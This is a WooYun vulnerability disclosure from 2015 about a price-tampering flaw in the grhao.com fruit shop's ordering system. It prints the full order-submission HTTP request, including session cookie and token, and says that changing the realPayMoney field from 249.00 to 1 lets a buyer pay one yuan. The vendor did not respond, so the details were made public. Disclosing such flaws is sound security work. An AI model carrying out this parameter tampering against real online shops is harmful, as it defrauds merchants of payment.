当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162724

漏洞标题:果然好水果商城水果1块钱随便吃

相关厂商:果然好水果商城

漏洞作者: 路人甲

提交时间:2015-12-20 23:31

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

果然好水果商城水果1块钱随便吃

详细说明:

1.png

2.jpg

3.png


POST /cusercenter/order/save.htm HTTP/1.1
Host: www.grhao.com
Content-Length: 766
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.grhao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.grhao.com/shopcarinfo/saveShoppingCart.do?goodsid=768&buyNumber=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=C36FB6417D671303294F2A05DFF0CEEA; ib_from_page=https://www.baidu.com/link?url=eOXZkTYnzOrs4wOiMTu63_r7z9ZP4xx7fG8fR3SIKhi&wd=&eqid=fae696b500024ad2000000035675162b; goodsList=%5B%7B%22goodsId%22%3A%22223%22%2C%22goodsLogo%22%3A%2220150401150227.jpg%22%2C%22goodsName%22%3A%22%E6%96%B0%E8%A5%BF%E5%85%B0%E4%BD%B3%E6%B2%9B%E7%BB%BF%E5%A5%87%E5%BC%82%E6%9E%9C%E5%8E%9F%E7%AE%B1%E8%A3%85%22%2C%22nomalPrice%22%3A%22150.67%22%2C%22nowPrice%22%3A%22115.90%22%2C%22dateTime%22%3A%221450514614465%22%7D%2C%7B%22goodsId%22%3A%22372%22%2C%22goodsLogo%22%3A%2220150401144939.jpg%22%2C%22goodsName%22%3A%22%E5%A2%A8%E8%A5%BF%E5%93%A5%E7%89%9B%E6%B2%B9%E6%9E%9C%208%E4%B8%AA%E8%A3%85%22%2C%22nomalPrice%22%3A%2285.67%22%2C%22nowPrice%22%3A%2265.90%22%2C%22dateTime%22%3A%221450514414846%22%7D%2C%7B%22goodsId%22%3A%22768%22%2C%22goodsLogo%22%3A%2220150528170858.jpg%22%2C%22goodsName%22%3A%22%E6%96%B0%E8%A5%BF%E5%85%B0%E4%BD%B3%E6%B2%9B%E9%87%91%E5%A5%87%E5%BC%82%E6%9E%9C%E5%8E%9F%E7%AE%B1%E8%A3%85%22%2C%22nomalPrice%22%3A%22323.70%22%2C%22nowPrice%22%3A%22249.00%22%2C%22dateTime%22%3A%221450515068953%22%7D%5D; Hm_lvt_f5092821594d011bd893686813c69adf=1450513980; Hm_lpvt_f5092821594d011bd893686813c69adf=1450515071; address=3301
struts.token.name=token&token=ORHRZZLGH3NBER2UE1AG0HOSXA9RTCYQ&orderInfo.receiveAddress=2680&goodsListObj%5B0%5D.goodsId=768&goodsListObj%5B0%5D.goodsNum=1&goodsListObj%5B0%5D.allPrice=249.00&orderInfo.payMethod=&youhuiquanradio=1&orderInfocoupontext=%E8%AF%B7%E8%BE%93%E5%85%A5%E4%BC%98%E6%83%A0%E5%88%B8%E7%BC%96%E5%8F%B7&orderInfo.message=%E5%8F%AF%E5%91%8A%E8%AF%89%E6%88%91%E4%BB%AC%E6%82%A8%E7%9A%84%E7%89%B9%E6%AE%8A%E8%A6%81%E6%B1%82%EF%BC%8C%E5%A6%82%E9%85%8D%E9%80%81%E6%97%B6%E9%97%B4%E7%AD%89%EF%BC%8C%E9%99%90%E5%AE%9A100%E4%B8%AA%E5%AD%97%E4%BB%A5%E5%86%85&orderInfo.billStatus=1&orderInfo.billName=&orderInfo.billTariff=&orderInfo.goodsMoney=249.00&specialPrice=249.00&orderInfo.score=0&orderInfo.postCost=0.0&orderInfo.realPayMoney=249.00&goodsId=768


把realPayMoney=249.00改为realPayMoney=1

漏洞证明:

4.png

5.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝